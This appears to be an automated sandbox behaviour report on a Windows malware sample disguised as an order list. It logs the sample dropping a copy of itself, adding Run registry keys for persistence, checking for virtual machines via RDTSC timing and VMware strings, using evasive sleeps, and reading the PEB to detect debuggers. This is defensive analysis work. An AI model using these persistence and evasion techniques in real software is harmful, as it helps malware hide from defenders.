Source: C:\Users\user\Desktop\Noua lista de comenzi.exe File created: C:\Users\user\Contacts\Tdfgwnfyyv.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Tdfgwnfyyv Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFX Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Tdfgwnfyyv Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Tdfgwnfyyv Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFX Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Contacts\Tdfgwnfyyv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\DpiScaling.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\DpiScaling.exe RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 0000000002D48604 second address: 0000000002D4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 0000000002D4899E second address: 0000000002D489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3012 Thread sleep time: -65000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5080 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5080 Thread sleep time: -82000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04646DE6 rdtsc 13_2_04646DE6
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\DpiScaling.exe API coverage: 6.0 %
Source: C:\Windows\SysWOW64\DpiScaling.exe Process information queried: ProcessInformation Jump to behavior
Source: explorer.exe, 0000000E.00000000.404715373.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.410296723.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.357539802.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000E.00000000.351243805.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.410296723.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000E.00000000.351243805.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000E.00000000.388516534.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA
Source: explorer.exe, 0000000E.00000000.410296723.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging
barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04646DE6 rdtsc 13_2_04646DE6
Enables debug privileges
Source: C:\Windows\SysWOW64\DpiScaling.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462746D mov eax, dword ptr fs:[00000030h] 13_2_0462746D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463A44B mov eax, dword ptr fs:[00000030h] 13_2_0463A44B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469C450 mov eax, dword ptr fs:[00000030h] 13_2_0469C450
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469C450 mov eax, dword ptr fs:[00000030h] 13_2_0469C450
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463BC2C mov eax, dword ptr fs:[00000030h] 13_2_0463BC2C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D740D mov eax, dword ptr fs:[00000030h] 13_2_046D740D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D740D mov eax, dword ptr fs:[00000030h] 13_2_046D740D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D740D mov eax, dword ptr fs:[00000030h] 13_2_046D740D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h] 13_2_04686C0A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h] 13_2_04686C0A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h] 13_2_04686C0A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686C0A mov eax, dword ptr fs:[00000030h] 13_2_04686C0A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1C06 mov eax, dword ptr fs:[00000030h] 13_2_046C1C06
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C14FB mov eax, dword ptr fs:[00000030h] 13_2_046C14FB
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686CF0 mov eax, dword ptr fs:[00000030h] 13_2_04686CF0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686CF0 mov eax, dword ptr fs:[00000030h] 13_2_04686CF0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686CF0 mov eax, dword ptr fs:[00000030h] 13_2_04686CF0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D8CD6 mov eax, dword ptr fs:[00000030h] 13_2_046D8CD6
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461849B mov eax, dword ptr fs:[00000030h] 13_2_0461849B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462C577 mov eax, dword ptr fs:[00000030h] 13_2_0462C577
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462C577 mov eax, dword ptr fs:[00000030h] 13_2_0462C577
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04643D43 mov eax, dword ptr fs:[00000030h] 13_2_04643D43
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04683540 mov eax, dword ptr fs:[00000030h] 13_2_04683540
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04627D50 mov eax, dword ptr fs:[00000030h] 13_2_04627D50
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460AD30 mov eax, dword ptr fs:[00000030h] 13_2_0460AD30
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04613D34 mov eax, dword ptr fs:[00000030h] 13_2_04613D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CE539 mov eax, dword ptr fs:[00000030h] 13_2_046CE539
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04634D3B mov eax, dword ptr fs:[00000030h] 13_2_04634D3B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04634D3B mov eax, dword ptr fs:[00000030h] 13_2_04634D3B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04634D3B mov eax, dword ptr fs:[00000030h] 13_2_04634D3B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D8D34 mov eax, dword ptr fs:[00000030h] 13_2_046D8D34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0468A537 mov eax, dword ptr fs:[00000030h] 13_2_0468A537
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0461D5E0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0461D5E0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 13_2_046CFDE2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 13_2_046CFDE2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 13_2_046CFDE2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 13_2_046CFDE2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046B8DF1 mov eax, dword ptr fs:[00000030h] 13_2_046B8DF1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h] 13_2_04686DC9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h] 13_2_04686DC9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h] 13_2_04686DC9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686DC9 mov ecx, dword ptr fs:[00000030h] 13_2_04686DC9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h] 13_2_04686DC9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04686DC9 mov eax, dword ptr fs:[00000030h] 13_2_04686DC9
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D05AC mov eax, dword ptr fs:[00000030h] 13_2_046D05AC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D05AC mov eax, dword ptr fs:[00000030h] 13_2_046D05AC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046335A1 mov eax, dword ptr fs:[00000030h] 13_2_046335A1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04631DB5 mov eax, dword ptr fs:[00000030h] 13_2_04631DB5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04631DB5 mov eax, dword ptr fs:[00000030h] 13_2_04631DB5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04631DB5 mov eax, dword ptr fs:[00000030h] 13_2_04631DB5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632581 mov eax, dword ptr fs:[00000030h] 13_2_04632581
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632581 mov eax, dword ptr fs:[00000030h] 13_2_04632581
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632581 mov eax, dword ptr fs:[00000030h] 13_2_04632581
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632581 mov eax, dword ptr fs:[00000030h] 13_2_04632581
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h] 13_2_04602D8A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h] 13_2_04602D8A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h] 13_2_04602D8A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h] 13_2_04602D8A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04602D8A mov eax, dword ptr fs:[00000030h] 13_2_04602D8A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463FD9B mov eax, dword ptr fs:[00000030h] 13_2_0463FD9B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463FD9B mov eax, dword ptr fs:[00000030h] 13_2_0463FD9B
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461766D mov eax, dword ptr fs:[00000030h] 13_2_0461766D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h] 13_2_0462AE73
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h] 13_2_0462AE73
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h] 13_2_0462AE73
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h] 13_2_0462AE73
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462AE73 mov eax, dword ptr fs:[00000030h] 13_2_0462AE73
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h] 13_2_04617E41
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h] 13_2_04617E41
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h] 13_2_04617E41
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h] 13_2_04617E41
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h] 13_2_04617E41
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04617E41 mov eax, dword ptr fs:[00000030h] 13_2_04617E41
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CAE44 mov eax, dword ptr fs:[00000030h] 13_2_046CAE44
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CAE44 mov eax, dword ptr fs:[00000030h] 13_2_046CAE44
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460E620 mov eax, dword ptr fs:[00000030h] 13_2_0460E620
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046BFE3F mov eax, dword ptr fs:[00000030h] 13_2_046BFE3F
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460C600 mov eax, dword ptr fs:[00000030h] 13_2_0460C600
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460C600 mov eax, dword ptr fs:[00000030h] 13_2_0460C600
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460C600 mov eax, dword ptr fs:[00000030h] 13_2_0460C600
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04638E00 mov eax, dword ptr fs:[00000030h] 13_2_04638E00
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1608 mov eax, dword ptr fs:[00000030h] 13_2_046C1608
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463A61C mov eax, dword ptr fs:[00000030h] 13_2_0463A61C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463A61C mov eax, dword ptr fs:[00000030h] 13_2_0463A61C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046316E0 mov ecx, dword ptr fs:[00000030h] 13_2_046316E0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046176E2 mov eax, dword ptr fs:[00000030h] 13_2_046176E2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04648EC7 mov eax, dword ptr fs:[00000030h] 13_2_04648EC7
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046BFEC0 mov eax, dword ptr fs:[00000030h] 13_2_046BFEC0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046336CC mov eax, dword ptr fs:[00000030h] 13_2_046336CC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D8ED6 mov eax, dword ptr fs:[00000030h] 13_2_046D8ED6
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 13_2_046D0EA5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 13_2_046D0EA5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 13_2_046D0EA5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046846A7 mov eax, dword ptr fs:[00000030h] 13_2_046846A7
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469FE87 mov eax, dword ptr fs:[00000030h] 13_2_0469FE87
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461FF60 mov eax, dword ptr fs:[00000030h] 13_2_0461FF60
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D8F6A mov eax, dword ptr fs:[00000030h] 13_2_046D8F6A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461EF40 mov eax, dword ptr fs:[00000030h] 13_2_0461EF40
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04604F2E mov eax, dword ptr fs:[00000030h] 13_2_04604F2E
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04604F2E mov eax, dword ptr fs:[00000030h] 13_2_04604F2E
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463E730 mov eax, dword ptr fs:[00000030h] 13_2_0463E730
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D070D mov eax, dword ptr fs:[00000030h] 13_2_046D070D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D070D mov eax, dword ptr fs:[00000030h] 13_2_046D070D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463A70E mov eax, dword ptr fs:[00000030h] 13_2_0463A70E
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463A70E mov eax, dword ptr fs:[00000030h] 13_2_0463A70E
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0462F716 mov eax, dword ptr fs:[00000030h] 13_2_0462F716
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469FF10 mov eax, dword ptr fs:[00000030h] 13_2_0469FF10
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469FF10 mov eax, dword ptr fs:[00000030h] 13_2_0469FF10
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046437F5 mov eax, dword ptr fs:[00000030h] 13_2_046437F5
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04618794 mov eax, dword ptr fs:[00000030h] 13_2_04618794
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04687794 mov eax, dword ptr fs:[00000030h] 13_2_04687794
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04687794 mov eax, dword ptr fs:[00000030h] 13_2_04687794
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04687794 mov eax, dword ptr fs:[00000030h] 13_2_04687794
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D1074 mov eax, dword ptr fs:[00000030h] 13_2_046D1074
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C2073 mov eax, dword ptr fs:[00000030h] 13_2_046C2073
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04620050 mov eax, dword ptr fs:[00000030h] 13_2_04620050
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04620050 mov eax, dword ptr fs:[00000030h] 13_2_04620050
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h] 13_2_0461B02A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h] 13_2_0461B02A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h] 13_2_0461B02A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461B02A mov eax, dword ptr fs:[00000030h] 13_2_0461B02A
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463002D mov eax, dword ptr fs:[00000030h] 13_2_0463002D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463002D mov eax, dword ptr fs:[00000030h] 13_2_0463002D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463002D mov eax, dword ptr fs:[00000030h] 13_2_0463002D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463002D mov eax, dword ptr fs:[00000030h] 13_2_0463002D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463002D mov eax, dword ptr fs:[00000030h] 13_2_0463002D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D4015 mov eax, dword ptr fs:[00000030h] 13_2_046D4015
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D4015 mov eax, dword ptr fs:[00000030h] 13_2_046D4015
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04687016 mov eax, dword ptr fs:[00000030h] 13_2_04687016
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04687016 mov eax, dword ptr fs:[00000030h] 13_2_04687016
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04687016 mov eax, dword ptr fs:[00000030h] 13_2_04687016
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046058EC mov eax, dword ptr fs:[00000030h] 13_2_046058EC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 13_2_0469B8D0
